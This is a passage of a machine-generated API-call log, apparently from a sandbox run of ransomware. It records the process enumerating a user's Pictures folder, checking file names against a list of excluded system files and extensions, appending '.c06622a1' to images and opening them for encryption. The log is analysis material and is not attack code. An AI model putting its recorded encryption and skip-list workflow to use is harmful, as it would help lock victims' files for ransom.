_Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png" [0155.382] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png") returned 0x38 [0155.382] wcscpy (in: _Dest=0x44e00f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.382] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dng-n3d9o.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dng-n3d9o.png.c06622a1"), dwFlags=0x8) returned 1 [0155.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dng-n3d9o.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0155.385] CreateIoCompletionPort (FileHandle=0x134, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.385] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2910020 [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7eeab543 [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x35460214 [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7272e88b [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3170e33f [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c0aa718 [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x89b4d67 [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71e78e59 [0155.390] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b7a9617 [0155.393] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2910094, Length=0x80) returned 0x3d71663e [0155.393] RtlComputeCrc32 (PartialCrc=0x663e, Buffer=0x2910094, Length=0x80) returned 0xfbad52ee [0155.393] RtlComputeCrc32 (PartialCrc=0x52ee, Buffer=0x2910094, Length=0x80) returned 0xf96191c3 [0155.393] RtlComputeCrc32 (PartialCrc=0x91c3, Buffer=0x2910094, Length=0x80) returned 0x45993a2c [0155.393] RtlComputeCrc32 (PartialCrc=0x3a2c, Buffer=0x2910094, Length=0x80) returned 0xa8a10b52 [0155.393] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0155.393] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0155.393] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0155.393] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0238c0, ftCreationTime.dwHighDateTime=0x1d5e66e, ftLastAccessTime.dwLowDateTime=0x320421d0, ftLastAccessTime.dwHighDateTime=0x1d5e417, ftLastWriteTime.dwLowDateTime=0x320421d0, ftLastWriteTime.dwHighDateTime=0x1d5e417, nFileSizeHigh=0x0, nFileSizeLow=0x154af, dwReserved0=0x0, dwReserved1=0x0, cFileName="jP5w5f0VdLdo-EbieAg_.png", cAlternateFileName="JP5W5F~1.PNG")) returned 1 [0155.393] _wcsicmp (_Str1="jP5w5f0VdLdo-EbieAg_.png", _Str2="README.c06622a1.TXT") returned -8 [0155.393] wcsstr (_Str="jP5w5f0VdLdo-EbieAg_.png", _SubStr="README") returned 0x0 [0155.393] _wcsicmp (_Str1="autorun.inf", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned -9 [0155.393] wcslen (_String="autorun.inf") returned 0xb [0155.393] _wcsicmp (_Str1="boot.ini", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned -8 [0155.393] wcslen (_String="boot.ini") returned 0x8 [0155.393] _wcsicmp (_Str1="bootfont.bin", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned -8 [0155.394] wcslen (_String="bootfont.bin") returned 0xc [0155.394] _wcsicmp (_Str1="bootsect.bak", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned -8 [0155.394] wcslen (_String="bootsect.bak") returned 0xc [0155.394] _wcsicmp (_Str1="desktop.ini", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned -6 [0155.394] wcslen (_String="desktop.ini") returned 0xb [0155.394] _wcsicmp (_Str1="iconcache.db", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned -1 [0155.394] wcslen (_String="iconcache.db") returned 0xc [0155.394] _wcsicmp (_Str1="ntldr", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned 4 [0155.394] wcslen (_String="ntldr") returned 0x5 [0155.394] _wcsicmp (_Str1="ntuser.dat", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned 4 [0155.394] wcslen (_String="ntuser.dat") returned 0xa [0155.394] _wcsicmp (_Str1="ntuser.dat.log", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned 4 [0155.394] wcslen (_String="ntuser.dat.log") returned 0xe [0155.394] _wcsicmp (_Str1="ntuser.ini", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned 4 [0155.394] wcslen (_String="ntuser.ini") returned 0xa [0155.394] _wcsicmp (_Str1="thumbs.db", _Str2="jP5w5f0VdLdo-EbieAg_.png") returned 10 [0155.394] wcslen (_String="thumbs.db") returned 0x9 [0155.394] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.394] wcslen (_String="386") returned 0x3 [0155.394] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.394] wcslen (_String="adv") returned 0x3 [0155.394] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.394] wcslen (_String="ani") returned 0x3 [0155.394] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.394] wcslen (_String="bat") returned 0x3 [0155.394] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.394] wcslen (_String="bin") returned 0x3 [0155.394] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.394] wcslen (_String="cab") returned 0x3 [0155.394] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.394] wcslen (_String="cmd") returned 0x3 [0155.394] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.394] wcslen (_String="com") returned 0x3 [0155.394] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.394] wcslen (_String="cpl") returned 0x3 [0155.394] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.394] wcslen (_String="cur") returned 0x3 [0155.394] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.395] wcslen (_String="deskthemepack") returned 0xd [0155.395] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.395] wcslen (_String="diagcab") returned 0x7 [0155.395] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.395] wcslen (_String="diagcfg") returned 0x7 [0155.395] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.395] wcslen (_String="diagpkg") returned 0x7 [0155.395] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.395] wcslen (_String="dll") returned 0x3 [0155.395] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.395] wcslen (_String="drv") returned 0x3 [0155.395] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.395] wcslen (_String="exe") returned 0x3 [0155.395] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.395] wcslen (_String="hlp") returned 0x3 [0155.395] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.395] wcslen (_String="icl") returned 0x3 [0155.395] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.395] wcslen (_String="icns") returned 0x4 [0155.395] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.395] wcslen (_String="ico") returned 0x3 [0155.395] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.395] wcslen (_String="ics") returned 0x3 [0155.395] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.395] wcslen (_String="idx") returned 0x3 [0155.395] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.395] wcslen (_String="ldf") returned 0x3 [0155.395] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.395] wcslen (_String="lnk") returned 0x3 [0155.395] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.395] wcslen (_String="mod") returned 0x3 [0155.395] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.395] wcslen (_String="mpa") returned 0x3 [0155.395] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.395] wcslen (_String="msc") returned 0x3 [0155.395] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.395] wcslen (_String="msp") returned 0x3 [0155.395] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.395] wcslen (_String="msstyles") returned 0x8 [0155.395] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.396] wcslen (_String="msu") returned 0x3 [0155.396] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.396] wcslen (_String="nls") returned 0x3 [0155.396] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.396] wcslen (_String="nomedia") returned 0x7 [0155.396] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.396] wcslen (_String="ocx") returned 0x3 [0155.396] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.396] wcslen (_String="prf") returned 0x3 [0155.396] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.396] wcslen (_String="ps1") returned 0x3 [0155.396] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.396] wcslen (_String="rom") returned 0x3 [0155.396] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.396] wcslen (_String="rtp") returned 0x3 [0155.396] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.396] wcslen (_String="scr") returned 0x3 [0155.396] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.396] wcslen (_String="shs") returned 0x3 [0155.396] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.396] wcslen (_String="spl") returned 0x3 [0155.396] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.396] wcslen (_String="sys") returned 0x3 [0155.396] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.396] wcslen (_String="theme") returned 0x5 [0155.396] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.396] wcslen (_String="themepack") returned 0x9 [0155.396] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.396] wcslen (_String="wpx") returned 0x3 [0155.396] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.396] wcslen (_String="lock") returned 0x4 [0155.396] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.396] wcslen (_String="key") returned 0x3 [0155.396] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.396] wcslen (_String="hta") returned 0x3 [0155.396] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.396] wcslen (_String="msi") returned 0x3 [0155.397] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.397] wcslen (_String="pdb") returned 0x3 [0155.397] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.397] wcslen (_String="sql") returned 0x3 [0155.397] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.397] wcslen (_String="sqlite") returned 0x6 [0155.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0155.397] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0155.397] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0155.397] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0155.397] wcscpy (in: _Dest=0x44d00ce, _Source="jP5w5f0VdLdo-EbieAg_.png" | out: _Dest="jP5w5f0VdLdo-EbieAg_.png") returned="jP5w5f0VdLdo-EbieAg_.png" [0155.397] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png", dwFileAttributes=0x80) returned 1 [0155.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp5w5f0vdldo-ebieag_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0155.397] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.397] ReadFile (in: hFile=0x670, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0155.398] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x38d184be [0155.398] RtlComputeCrc32 (PartialCrc=0x84be, Buffer=0x3feb74, Length=0x80) returned 0x29c74c9b [0155.398] RtlComputeCrc32 (PartialCrc=0x4c9b, Buffer=0x3feb74, Length=0x80) returned 0x19138bc6 [0155.398] RtlComputeCrc32 (PartialCrc=0x8bc6, Buffer=0x3feb74, Length=0x80) returned 0x74e1e72b [0155.398] RtlComputeCrc32 (PartialCrc=0xe72b, Buffer=0x3feb74, Length=0x80) returned 0x3a882406 [0155.398] CloseHandle (hObject=0x670) returned 1 [0155.398] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0155.398] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png" [0155.398] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png") returned 0x43 [0155.398] wcscpy (in: _Dest=0x44e0106, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.398] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp5w5f0vdldo-ebieag_.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp5w5f0vdldo-ebieag_.png.c06622a1"), dwFlags=0x8) returned 1 [0155.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jP5w5f0VdLdo-EbieAg_.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp5w5f0vdldo-ebieag_.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0155.404] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.404] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x495974cb [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b039612 [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ca9b502 [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68864e0f [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32105382 [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ed29a10 [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x196a179 [0155.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x664e3bb5 [0155.412] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x1f911ad2 [0155.412] RtlComputeCrc32 (PartialCrc=0x1ad2, Buffer=0x2f30094, Length=0x80) returned 0x5b41a66a [0155.413] RtlComputeCrc32 (PartialCrc=0xa66a, Buffer=0x2f30094, Length=0x80) returned 0xa7b9df2e [0155.413] RtlComputeCrc32 (PartialCrc=0xdf2e, Buffer=0x2f30094, Length=0x80) returned 0xcda5c5b3 [0155.413] RtlComputeCrc32 (PartialCrc=0xc5b3, Buffer=0x2f30094, Length=0x80) returned 0xd60530bc [0155.413] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0155.413] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0155.413] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0155.413] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x223dbbe0, ftCreationTime.dwHighDateTime=0x1d5da8e, ftLastAccessTime.dwLowDateTime=0x9a2082b0, ftLastAccessTime.dwHighDateTime=0x1d5de66, ftLastWriteTime.dwLowDateTime=0x9a2082b0, ftLastWriteTime.dwHighDateTime=0x1d5de66, nFileSizeHigh=0x0, nFileSizeLow=0x40f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="melgzpehBJ5nW.jpg", cAlternateFileName="MELGZP~1.JPG")) returned 1 [0155.413] _wcsicmp (_Str1="melgzpehBJ5nW.jpg", _Str2="README.c06622a1.TXT") returned -5 [0155.413] wcsstr (_Str="melgzpehBJ5nW.jpg", _SubStr="README") returned 0x0 [0155.413] _wcsicmp (_Str1="autorun.inf", _Str2="melgzpehBJ5nW.jpg") returned -12 [0155.413] wcslen (_String="autorun.inf") returned 0xb [0155.413] _wcsicmp (_Str1="boot.ini", _Str2="melgzpehBJ5nW.jpg") returned -11 [0155.413] wcslen (_String="boot.ini") returned 0x8 [0155.413] _wcsicmp (_Str1="bootfont.bin", _Str2="melgzpehBJ5nW.jpg") returned -11 [0155.413] wcslen (_String="bootfont.bin") returned 0xc [0155.413] _wcsicmp (_Str1="bootsect.bak", _Str2="melgzpehBJ5nW.jpg") returned -11 [0155.413] wcslen (_String="bootsect.bak") returned 0xc [0155.413] _wcsicmp (_Str1="desktop.ini", _Str2="melgzpehBJ5nW.jpg") returned -9 [0155.413] wcslen (_String="desktop.ini") returned 0xb [0155.413] _wcsicmp (_Str1="iconcache.db", _Str2="melgzpehBJ5nW.jpg") returned -4 [0155.413] wcslen (_String="iconcache.db") returned 0xc [0155.413] _wcsicmp (_Str1="ntldr", _Str2="melgzpehBJ5nW.jpg") returned 1 [0155.413] wcslen (_String="ntldr") returned 0x5 [0155.413] _wcsicmp (_Str1="ntuser.dat", _Str2="melgzpehBJ5nW.jpg") returned 1 [0155.413] wcslen (_String="ntuser.dat") returned 0xa [0155.413] _wcsicmp (_Str1="ntuser.dat.log", _Str2="melgzpehBJ5nW.jpg") returned 1 [0155.413] wcslen (_String="ntuser.dat.log") returned 0xe [0155.413] _wcsicmp (_Str1="ntuser.ini", _Str2="melgzpehBJ5nW.jpg") returned 1 [0155.413] wcslen (_String="ntuser.ini") returned 0xa [0155.413] _wcsicmp (_Str1="thumbs.db", _Str2="melgzpehBJ5nW.jpg") returned 7 [0155.413] wcslen (_String="thumbs.db") returned 0x9 [0155.413] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0155.413] wcslen (_String="386") returned 0x3 [0155.413] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0155.413] wcslen (_String="adv") returned 0x3 [0155.413] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0155.414] wcslen (_String="ani") returned 0x3 [0155.414] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0155.414] wcslen (_String="bat") returned 0x3 [0155.414] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0155.414] wcslen (_String="bin") returned 0x3 [0155.414] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0155.414] wcslen (_String="cab") returned 0x3 [0155.414] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0155.414] wcslen (_String="cmd") returned 0x3 [0155.414] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0155.414] wcslen (_String="com") returned 0x3 [0155.414] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0155.414] wcslen (_String="cpl") returned 0x3 [0155.414] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0155.414] wcslen (_String="cur") returned 0x3 [0155.414] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0155.414] wcslen (_String="deskthemepack") returned 0xd [0155.414] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0155.414] wcslen (_String="diagcab") returned 0x7 [0155.414] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0155.414] wcslen (_String="diagcfg") returned 0x7 [0155.414] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0155.414] wcslen (_String="diagpkg") returned 0x7 [0155.414] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0155.414] wcslen (_String="dll") returned 0x3 [0155.414] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0155.414] wcslen (_String="drv") returned 0x3 [0155.414] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0155.414] wcslen (_String="exe") returned 0x3 [0155.414] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0155.414] wcslen (_String="hlp") returned 0x3 [0155.414] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0155.414] wcslen (_String="icl") returned 0x3 [0155.414] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0155.414] wcslen (_String="icns") returned 0x4 [0155.414] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0155.414] wcslen (_String="ico") returned 0x3 [0155.414] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0155.414] wcslen (_String="ics") returned 0x3 [0155.414] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0155.415] wcslen (_String="idx") returned 0x3 [0155.415] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0155.415] wcslen (_String="ldf") returned 0x3 [0155.415] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0155.415] wcslen (_String="lnk") returned 0x3 [0155.415] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0155.415] wcslen (_String="mod") returned 0x3 [0155.415] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0155.415] wcslen (_String="mpa") returned 0x3 [0155.415] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0155.415] wcslen (_String="msc") returned 0x3 [0155.415] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0155.415] wcslen (_String="msp") returned 0x3 [0155.415] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0155.415] wcslen (_String="msstyles") returned 0x8 [0155.415] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0155.415] wcslen (_String="msu") returned 0x3 [0155.415] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0155.415] wcslen (_String="nls") returned 0x3 [0155.415] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0155.415] wcslen (_String="nomedia") returned 0x7 [0155.415] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0155.415] wcslen (_String="ocx") returned 0x3 [0155.415] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0155.415] wcslen (_String="prf") returned 0x3 [0155.415] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0155.415] wcslen (_String="ps1") returned 0x3 [0155.415] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0155.415] wcslen (_String="rom") returned 0x3 [0155.415] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0155.415] wcslen (_String="rtp") returned 0x3 [0155.415] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0155.415] wcslen (_String="scr") returned 0x3 [0155.415] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0155.415] wcslen (_String="shs") returned 0x3 [0155.415] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0155.415] wcslen (_String="spl") returned 0x3 [0155.415] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0155.415] wcslen (_String="sys") returned 0x3 [0155.416] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0155.416] wcslen (_String="theme") returned 0x5 [0155.416] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0155.416] wcslen (_String="themepack") returned 0x9 [0155.416] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0155.416] wcslen (_String="wpx") returned 0x3 [0155.416] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0155.416] wcslen (_String="lock") returned 0x4 [0155.416] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0155.416] wcslen (_String="key") returned 0x3 [0155.416] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0155.416] wcslen (_String="hta") returned 0x3 [0155.416] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0155.416] wcslen (_String="msi") returned 0x3 [0155.416] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0155.416] wcslen (_String="pdb") returned 0x3 [0155.416] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0155.416] wcslen (_String="sql") returned 0x3 [0155.416] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0155.416] wcslen (_String="sqlite") returned 0x6 [0155.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0155.416] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0155.416] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0155.416] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0155.416] wcscpy (in: _Dest=0x44d00ce, _Source="melgzpehBJ5nW.jpg" | out: _Dest="melgzpehBJ5nW.jpg") returned="melgzpehBJ5nW.jpg" [0155.416] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg", dwFileAttributes=0x80) returned 1 [0155.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\melgzpehbj5nw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 